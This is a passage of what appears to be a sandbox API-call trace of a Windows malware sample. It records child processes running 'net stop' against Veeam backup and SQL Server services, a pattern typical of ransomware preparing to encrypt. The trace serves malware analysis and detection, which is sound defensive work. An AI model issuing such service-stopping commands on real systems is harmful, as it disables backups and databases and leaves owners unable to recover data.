lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0047.957] WriteFile (in: hFile=0x26c, lpBuffer=0x754060*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1ffdb4, lpOverlapped=0x0 | out: lpBuffer=0x754060*, lpNumberOfBytesWritten=0x1ffdb4*=0x1e, lpOverlapped=0x0) returned 1 [0047.957] LocalFree (hMem=0x754060) returned 0x0 [0047.957] GetFileType (hFile=0x26c) returned 0x3 [0047.957] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x756308 [0047.957] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x756308, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nu", lpUsedDefaultChar=0x0) returned 2 [0047.957] WriteFile (in: hFile=0x26c, lpBuffer=0x756308*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ffdb4, lpOverlapped=0x0 | out: lpBuffer=0x756308*, lpNumberOfBytesWritten=0x1ffdb4*=0x2, lpOverlapped=0x0) returned 1 [0047.957] LocalFree (hMem=0x756308) returned 0x0 [0047.957] _ultow (in: _Dest=0x889, _Radix=2096612 | out: _Dest=0x889) returned="2185" [0047.957] FormatMessageW (in: dwFlags=0x2800, lpSource=0x747a0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x56b338, nSize=0x800, Arguments=0x569dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0047.957] GetFileType (hFile=0x26c) returned 0x3 [0047.957] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x756308 [0047.957] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x756308, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0047.957] WriteFile (in: hFile=0x26c, lpBuffer=0x756308*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1ffdc0, lpOverlapped=0x0 | out: lpBuffer=0x756308*, lpNumberOfBytesWritten=0x1ffdc0*=0x34, lpOverlapped=0x0) returned 1 [0047.957] LocalFree (hMem=0x756308) returned 0x0 [0047.957] GetFileType (hFile=0x26c) returned 0x3 [0047.957] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x756308 [0047.957] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x756308, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nu", lpUsedDefaultChar=0x0) returned 2 [0047.957] WriteFile (in: hFile=0x26c, lpBuffer=0x756308*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ffdc0, lpOverlapped=0x0 | out: lpBuffer=0x756308*, lpNumberOfBytesWritten=0x1ffdc0*=0x2, lpOverlapped=0x0) returned 1 [0047.957] LocalFree (hMem=0x756308) returned 0x0 [0047.958] NetApiBufferFree (Buffer=0x751ca8) returned 0x0 [0047.958] NetApiBufferFree (Buffer=0x751cc0) returned 0x0 [0047.958] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y" [0047.958] exit (_Code=2) Process: id = "104" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x44ad7000" os_pid = "0x898" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop VeeamDeploymentService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 173 os_tid = 0x9fc Process: id = "105" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x46063000" os_pid = "0x8d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "104" os_parent_pid = "0x898" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamDeploymentService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 174 os_tid = 0xa24 [0048.141] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36fee4 | out: lpSystemTimeAsFileTime=0x36fee4*(dwLowDateTime=0xe6cfa580, dwHighDateTime=0x1d57a86)) [0048.141] GetCurrentProcessId () returned 0x8d4 [0048.141] GetCurrentThreadId () returned 0xa24 [0048.141] GetTickCount () returned 0x1146f37 [0048.141] QueryPerformanceCounter (in: lpPerformanceCount=0x36fedc | out: lpPerformanceCount=0x36fedc*=16842536079) returned 1 [0048.141] GetModuleHandleA (lpModuleName=0x0) returned 0x3d0000 [0048.141] __set_app_type (_Type=0x1) [0048.141] __p__fmode () returned 0x74eb31f4 [0048.141] __p__commode () returned 0x74eb31fc [0048.141] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3dffe6) returned 0x0 [0048.141] __getmainargs (in: _Argc=0x3e9064, _Argv=0x3e906c, _Env=0x3e9068, _DoWildCard=0, _StartInfo=0x3e9024 | out: _Argc=0x3e9064, _Argv=0x3e906c, _Env=0x3e9068) returned 0 [0048.141] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0048.141] GetConsoleOutputCP () returned 0x1b5 [0048.142] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3e9080 | out: lpCPInfo=0x3e9080) returned 1 [0048.142] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.145] sprintf_s (in: _DstBuf=0x36fe9c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0048.146] setlocale (category=0, locale=".437") returned="English_United States.437" [0048.148] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0048.148] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0048.148] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamDeploymentService /y" [0048.148] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x36fc68, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0048.148] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x80) returned 0x834bf8 [0048.148] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0048.148] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36fe6c | out: Buffer=0x36fe6c*=0x831c90) returned 0x0 [0048.148] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36fe6c | out: Buffer=0x36fe6c*=0x831ca8) returned 0x0 [0048.148] _fileno (_File=0x74eb2900) returned -2 [0048.148] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0048.148] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0048.148] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0048.148] _wcsicmp (_String1="config", _String2="stop") returned -16 [0048.148] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0048.148] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0048.148] _wcsicmp (_String1="file", _String2="stop") returned -13 [0048.148] _wcsicmp (_String1="files", _String2="stop") returned -13 [0048.148] _wcsicmp (_String1="group", _String2="stop") returned -12 [0048.148] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0048.148] _wcsicmp (_String1="help", _String2="stop") returned -11 [0048.148] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0048.148] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0048.148] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0048.148] _wcsicmp (_String1="session", _String2="stop") returned -15 [0048.149] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0048.149] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0048.149] _wcsicmp (_String1="share", _String2="stop") returned -12 [0048.149] _wcsicmp (_String1="start", _String2="stop") returned -14 [0048.149] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0048.149] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0048.149] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0048.149] _wcsicmp (_String1="accounts", _String2="VeeamDeploymentService") returned -21 [0048.149] _wcsicmp (_String1="computer", _String2="VeeamDeploymentService") returned -19 [0048.149] _wcsicmp (_String1="config", _String2="VeeamDeploymentService") returned -19 [0048.149] _wcsicmp (_String1="continue", _String2="VeeamDeploymentService") returned -19 [0048.149] _wcsicmp (_String1="cont", _String2="VeeamDeploymentService") returned -19 [0048.149] _wcsicmp (_String1="file", _String2="VeeamDeploymentService") returned -16 [0048.149] _wcsicmp (_String1="files", _String2="VeeamDeploymentService") returned -16 [0048.149] _wcsicmp (_String1="group", _String2="VeeamDeploymentService") returned -15 [0048.149] _wcsicmp (_String1="groups", _String2="VeeamDeploymentService") returned -15 [0048.149] _wcsicmp (_String1="help", _String2="VeeamDeploymentService") returned -14 [0048.149] _wcsicmp (_String1="helpmsg", _String2="VeeamDeploymentService") returned -14 [0048.149] _wcsicmp (_String1="localgroup", _String2="VeeamDeploymentService") returned -10 [0048.149] _wcsicmp (_String1="pause", _String2="VeeamDeploymentService") returned -6 [0048.149] _wcsicmp (_String1="session", _String2="VeeamDeploymentService") returned -3 [0048.149] _wcsicmp (_String1="sessions", _String2="VeeamDeploymentService") returned -3 [0048.149] _wcsicmp (_String1="sess", _String2="VeeamDeploymentService") returned -3 [0048.149] _wcsicmp (_String1="share", _String2="VeeamDeploymentService") returned -3 [0048.149] _wcsicmp (_String1="start", _String2="VeeamDeploymentService") returned -3 [0048.149] _wcsicmp (_String1="stats", _String2="VeeamDeploymentService") returned -3 [0048.149] _wcsicmp (_String1="statistics", _String2="VeeamDeploymentService") returned -3 [0048.149] _wcsicmp (_String1="stop", _String2="VeeamDeploymentService") returned -3 [0048.149] _wcsicmp (_String1="time", _String2="VeeamDeploymentService") returned -2 [0048.149] _wcsicmp (_String1="user", _String2="VeeamDeploymentService") returned -1 [0048.149] _wcsicmp (_String1="users", _String2="VeeamDeploymentService") returned -1 [0048.149] _wcsicmp (_String1="msg", _String2="VeeamDeploymentService") returned -9 [0048.149] _wcsicmp (_String1="messenger", _String2="VeeamDeploymentService") returned -9 [0048.149] _wcsicmp (_String1="receiver", _String2="VeeamDeploymentService") returned -4 [0048.149] _wcsicmp (_String1="rcv", _String2="VeeamDeploymentService") returned -4 [0048.149] _wcsicmp (_String1="netpopup", _String2="VeeamDeploymentService") returned -8 [0048.149] _wcsicmp (_String1="redirector", _String2="VeeamDeploymentService") returned -4 [0048.149] _wcsicmp (_String1="redir", _String2="VeeamDeploymentService") returned -4 [0048.150] _wcsicmp (_String1="rdr", _String2="VeeamDeploymentService") returned -4 [0048.150] _wcsicmp (_String1="workstation", _String2="VeeamDeploymentService") returned 1 [0048.150] _wcsicmp (_String1="work", _String2="VeeamDeploymentService") returned 1 [0048.150] _wcsicmp (_String1="wksta", _String2="VeeamDeploymentService") returned 1 [0048.150] _wcsicmp (_String1="prdr", _String2="VeeamDeploymentService") returned -6 [0048.150] _wcsicmp (_String1="devrdr", _String2="VeeamDeploymentService") returned -18 [0048.150] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamDeploymentService") returned -10 [0048.150] _wcsicmp (_String1="server", _String2="VeeamDeploymentService") returned -3 [0048.150] _wcsicmp (_String1="svr", _String2="VeeamDeploymentService") returned -3 [0048.150] _wcsicmp (_String1="srv", _String2="VeeamDeploymentService") returned -3 [0048.150] _wcsicmp (_String1="lanmanserver", _String2="VeeamDeploymentService") returned -10 [0048.150] _wcsicmp (_String1="alerter", _String2="VeeamDeploymentService") returned -21 [0048.150] _wcsicmp (_String1="netlogon", _String2="VeeamDeploymentService") returned -8 [0048.150] _wcsupr (in: _String="VeeamDeploymentService" | out: _String="VEEAMDEPLOYMENTSERVICE") returned="VEEAMDEPLOYMENTSERVICE" [0048.150] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x8354c8 [0048.153] GetServiceKeyNameW (in: hSCManager=0x8354c8, lpDisplayName="VEEAMDEPLOYMENTSERVICE", lpServiceName=0x3eaaf0, lpcchBuffer=0x36fe08 | out: lpServiceName="", lpcchBuffer=0x36fe08) returned 0 [0048.153] _wcsicmp (_String1="msg", _String2="VEEAMDEPLOYMENTSERVICE") returned -9 [0048.153] _wcsicmp (_String1="messenger", _String2="VEEAMDEPLOYMENTSERVICE") returned -9 [0048.153] _wcsicmp (_String1="receiver", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0048.153] _wcsicmp (_String1="rcv", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0048.153] _wcsicmp (_String1="redirector", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0048.153] _wcsicmp (_String1="redir", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0048.153] _wcsicmp (_String1="rdr", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0048.153] _wcsicmp (_String1="workstation", _String2="VEEAMDEPLOYMENTSERVICE") returned 1 [0048.153] _wcsicmp (_String1="work", _String2="VEEAMDEPLOYMENTSERVICE") returned 1 [0048.153] _wcsicmp (_String1="wksta", _String2="VEEAMDEPLOYMENTSERVICE") returned 1 [0048.153] _wcsicmp (_String1="prdr", _String2="VEEAMDEPLOYMENTSERVICE") returned -6 [0048.153] _wcsicmp (_String1="devrdr", _String2="VEEAMDEPLOYMENTSERVICE") returned -18 [0048.153] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMDEPLOYMENTSERVICE") returned -10 [0048.153] _wcsicmp (_String1="server", _String2="VEEAMDEPLOYMENTSERVICE") returned -3 [0048.153] _wcsicmp (_String1="svr", _String2="VEEAMDEPLOYMENTSERVICE") returned -3 [0048.153] _wcsicmp (_String1="srv", _String2="VEEAMDEPLOYMENTSERVICE") returned -3 [0048.153] _wcsicmp (_String1="lanmanserver", _String2="VEEAMDEPLOYMENTSERVICE") returned -10 [0048.153] _wcsicmp (_String1="alerter", _String2="VEEAMDEPLOYMENTSERVICE") returned -21 [0048.154] _wcsicmp (_String1="netlogon", _String2="VEEAMDEPLOYMENTSERVICE") returned -8 [0048.154] NetServiceControl (in: servername=0x0, service="VEEAMDEPLOYMENTSERVICE", opcode=0x0, arg=0x0, bufptr=0x36fe04 | out: bufptr=0x36fe04) returned 0x889 [0048.154] wcscpy_s (in: _Destination=0x3ea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0048.154] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73d30000 [0048.155] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73d30000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3eb338, nSize=0x800, Arguments=0x3e9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0048.156] GetFileType (hFile=0x26c) returned 0x3 [0048.156] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x833ca0 [0048.156] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x833ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0048.156] WriteFile (in: hFile=0x26c, lpBuffer=0x833ca0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x36fd44, lpOverlapped=0x0 | out: lpBuffer=0x833ca0*, lpNumberOfBytesWritten=0x36fd44*=0x1e, lpOverlapped=0x0) returned 1 [0048.156] LocalFree (hMem=0x833ca0) returned 0x0 [0048.156] GetFileType (hFile=0x26c) returned 0x3 [0048.156] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x836290 [0048.156] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x836290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x83", lpUsedDefaultChar=0x0) returned 2 [0048.156] WriteFile (in: hFile=0x26c, lpBuffer=0x836290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36fd44, lpOverlapped=0x0 | out: lpBuffer=0x836290*, lpNumberOfBytesWritten=0x36fd44*=0x2, lpOverlapped=0x0) returned 1 [0048.156] LocalFree (hMem=0x836290) returned 0x0 [0048.156] _ultow (in: _Dest=0x889, _Radix=3603828 | out: _Dest=0x889) returned="2185" [0048.156] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73d30000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3eb338, nSize=0x800, Arguments=0x3e9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0048.157] GetFileType (hFile=0x26c) returned 0x3 [0048.157] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x836290 [0048.157] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x836290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0048.157] WriteFile (in: hFile=0x26c, lpBuffer=0x836290*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x36fd50, lpOverlapped=0x0 | out: lpBuffer=0x836290*, lpNumberOfBytesWritten=0x36fd50*=0x34, lpOverlapped=0x0) returned 1 [0048.157] LocalFree (hMem=0x836290) returned 0x0 [0048.157] GetFileType (hFile=0x26c) returned 0x3 [0048.157] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x836290 [0048.157] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x836290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x83", lpUsedDefaultChar=0x0) returned 2 [0048.157] WriteFile (in: hFile=0x26c, lpBuffer=0x836290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36fd50, lpOverlapped=0x0 | out: lpBuffer=0x836290*, lpNumberOfBytesWritten=0x36fd50*=0x2, lpOverlapped=0x0) returned 1 [0048.157] LocalFree (hMem=0x836290) returned 0x0 [0048.157] NetApiBufferFree (Buffer=0x831c90) returned 0x0 [0048.157] NetApiBufferFree (Buffer=0x831ca8) returned 0x0 [0048.157] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamDeploymentService /y" [0048.157] exit (_Code=2) Process: id = "106" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x45ddc000" os_pid = "0x8d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 175 os_tid = 0x974 Process: id = "107" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x45a4a000" os_pid = "0x8c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "106" os_parent_pid = "0x8d0" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 177 os_tid = 0x8cc [0048.353] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35fc60 | out: lpSystemTimeAsFileTime=0x35fc60*(dwLowDateTime=0xe6f0f8c0, dwHighDateTime=0x1d57a86)) [0048.353] GetCurrentProcessId () returned 0x8c8 [0048.353] GetCurrentThreadId () returned 0x8cc [0048.353] GetTickCount () returned 0x1147012 [0048.353] QueryPerformanceCounter (in: lpPerformanceCount=0x35fc58 | out: lpPerformanceCount=0x35fc58*=16863795832) returned 1 [0048.354] GetModuleHandleA (lpModuleName=0x0) returned 0xab0000 [0048.354] __set_app_type (_Type=0x1) [0048.354] __p__fmode () returned 0x74eb31f4 [0048.354] __p__commode () returned 0x74eb31fc [0048.354] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xabffe6) returned 0x0 [0048.354] __getmainargs (in: _Argc=0xac9064, _Argv=0xac906c, _Env=0xac9068, _DoWildCard=0, _StartInfo=0xac9024 | out: _Argc=0xac9064, _Argv=0xac906c, _Env=0xac9068) returned 0 [0048.354] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0048.354] GetConsoleOutputCP () returned 0x1b5 [0048.354] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xac9080 | out: lpCPInfo=0xac9080) returned 1 [0048.354] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.357] sprintf_s (in: _DstBuf=0x35fc18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0048.358] setlocale (category=0, locale=".437") returned="English_United States.437" [0048.360] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0048.360] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0048.360] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$TPS /y" [0048.360] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35f9e4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0048.360] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x6c) returned 0x713c10 [0048.360] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0048.360] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fbe8 | out: Buffer=0x35fbe8*=0x711c70) returned 0x0 [0048.360] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fbe8 | out: Buffer=0x35fbe8*=0x711c88) returned 0x0 [0048.360] _fileno (_File=0x74eb2900) returned -2 [0048.360] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0048.360] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0048.360] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0048.360] _wcsicmp (_String1="config", _String2="stop") returned -16 [0048.360] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0048.360] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0048.360] _wcsicmp (_String1="file", _String2="stop") returned -13 [0048.360] _wcsicmp (_String1="files", _String2="stop") returned -13 [0048.360] _wcsicmp (_String1="group", _String2="stop") returned -12 [0048.360] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0048.360] _wcsicmp (_String1="help", _String2="stop") returned -11 [0048.360] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0048.360] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0048.361] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0048.361] _wcsicmp (_String1="session", _String2="stop") returned -15 [0048.361] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0048.361] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0048.361] _wcsicmp (_String1="share", _String2="stop") returned -12 [0048.361] _wcsicmp (_String1="start", _String2="stop") returned -14 [0048.361] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0048.361] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0048.361] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0048.361] _wcsicmp (_String1="accounts", _String2="SQLAgent$TPS") returned -18 [0048.361] _wcsicmp (_String1="computer", _String2="SQLAgent$TPS") returned -16 [0048.361] _wcsicmp (_String1="config", _String2="SQLAgent$TPS") returned -16 [0048.361] _wcsicmp (_String1="continue", _String2="SQLAgent$TPS") returned -16 [0048.361] _wcsicmp (_String1="cont", _String2="SQLAgent$TPS") returned -16 [0048.361] _wcsicmp (_String1="file", _String2="SQLAgent$TPS") returned -13 [0048.361] _wcsicmp (_String1="files", _String2="SQLAgent$TPS") returned -13 [0048.361] _wcsicmp (_String1="group", _String2="SQLAgent$TPS") returned -12 [0048.361] _wcsicmp (_String1="groups", _String2="SQLAgent$TPS") returned -12 [0048.361] _wcsicmp (_String1="help", _String2="SQLAgent$TPS") returned -11 [0048.361] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$TPS") returned -11 [0048.361] _wcsicmp (_String1="localgroup", _String2="SQLAgent$TPS") returned -7 [0048.362] _wcsicmp (_String1="pause", _String2="SQLAgent$TPS") returned -3 [0048.362] _wcsicmp (_String1="session", _String2="SQLAgent$TPS") returned -12 [0048.362] _wcsicmp (_String1="sessions", _String2="SQLAgent$TPS") returned -12 [0048.362] _wcsicmp (_String1="sess", _String2="SQLAgent$TPS") returned -12 [0048.362] _wcsicmp (_String1="share", _String2="SQLAgent$TPS") returned -9 [0048.362] _wcsicmp (_String1="start", _String2="SQLAgent$TPS") returned 3 [0048.362] _wcsicmp (_String1="stats", _String2="SQLAgent$TPS") returned 3 [0048.362] _wcsicmp (_String1="statistics", _String2="SQLAgent$TPS") returned 3 [0048.362] _wcsicmp (_String1="stop", _String2="SQLAgent$TPS") returned 3 [0048.362] _wcsicmp (_String1="time", _String2="SQLAgent$TPS") returned 1 [0048.362] _wcsicmp (_String1="user", _String2="SQLAgent$TPS") returned 2 [0048.362] _wcsicmp (_String1="users", _String2="SQLAgent$TPS") returned 2 [0048.362] _wcsicmp (_String1="msg", _String2="SQLAgent$TPS") returned -6 [0048.362] _wcsicmp (_String1="messenger", _String2="SQLAgent$TPS") returned -6 [0048.362] _wcsicmp (_String1="receiver", _String2="SQLAgent$TPS") returned -1 [0048.362] _wcsicmp (_String1="rcv", _String2="SQLAgent$TPS") returned -1 [0048.362] _wcsicmp (_String1="netpopup", _String2="SQLAgent$TPS") returned -5 [0048.362] _wcsicmp (_String1="redirector", _String2="SQLAgent$TPS") returned -1 [0048.362] _wcsicmp (_String1="redir", _String2="SQLAgent$TPS") returned -1 [0048.362] _wcsicmp (_String1="rdr", _String2="SQLAgent$TPS") returned -1 [0048.362] _wcsicmp (_String1="workstation", _String2="SQLAgent$TPS") returned 4 [0048.362] _wcsicmp (_String1="work", _String2="SQLAgent$TPS") returned 4 [0048.362] _wcsicmp (_String1="wksta", _String2="SQLAgent$TPS") returned 4 [0048.363] _wcsicmp (_String1="prdr", _String2="SQLAgent$TPS") returned -3 [0048.363] _wcsicmp (_String1="devrdr", _String2="SQLAgent$TPS") returned -15 [0048.363] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$TPS") returned -7 [0048.363] _wcsicmp (_String1="server", _String2="SQLAgent$TPS") returned -12 [0048.363] _wcsicmp (_String1="svr", _String2="SQLAgent$TPS") returned 5 [0048.363] _wcsicmp (_String1="srv", _String2="SQLAgent$TPS") returned 1 [0048.363] _wcsicmp (_String1="lanmanserver", 